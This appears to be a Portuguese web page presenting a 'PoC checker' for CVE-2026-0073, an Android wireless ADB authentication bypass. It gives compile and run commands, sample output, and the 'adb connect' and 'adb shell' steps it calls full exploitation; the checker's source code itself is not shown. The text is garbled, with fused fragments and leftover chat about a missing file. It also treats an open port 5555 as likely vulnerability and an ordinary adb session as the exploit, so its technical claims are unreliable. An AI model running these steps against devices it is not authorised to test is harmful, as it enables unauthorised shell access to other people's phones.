
CVE-2026-0073
CVE-2026-0073 é uma vulnerabilidade crítica de bypass de autenticação no ADB sem fio do Android (daemon adbd).
Um atacante na mesma rede pode contornar a autenticação TLS mútua e conectar-se ao dispositivo sem aprovação do usuário ou pareamento prévio.
| Item | Detalhes |
|---|---|
| ID do CVE | CVE-2026-0073 |
| Gravidade | Crítica |
| Pontuação CVSS | 8.8 |
| Componente Afetado | adbd (Android Debug Bridge) - Manipulador TLS |
| Tipo | Bypass de Autenticação |
| Impacto | Acesso Remoto ao Shell (usuário shell) |
| Corrigido | Boletim de Segurança do Android de maio de 2026 |
Corrigido em: nível de patch de segurança 2026-05-01 ou posterior.
shelladbd_tls_verify_cert()O erro ocorre porque o arquivo CVE-2026-0073-Checker.cpp ainda não existe.
nano CVE-2026-0073-Checker.cpp
Copie e cole o código completo abaixo no editor:
Salve e saia (Ctrl + X → Y → Enter)
Compile novamente:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Veja exatamente o que você verá se o programa C++ funcionar com sucesso em um dispositivo Android vulnerável:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN em verde → A porta ADB está escutando.Execute estes comandos:
adb connect 192.168.1.105:5555
Se aparecer:
connected to 192.168.1.105:5555
Então digite:
adb shell
Você deve obter acesso ao dispositivo:
pixel8:/ $
Isso é exploração totalmente bem-sucedida.
Este PoC é apenas para fins educacionais e testes autorizados.
Você só pode usar esta ferramenta em dispositivos que você possui ou para os quais tenha permissão explícita para testar. O uso não autorizado é ilegal e estritamente proibido.
Use por sua conta e risco. O autor não é responsável por quaisquer danos ou consequências legais.
🎯 Feito com cautela — Use apenas em dispositivos autorizados.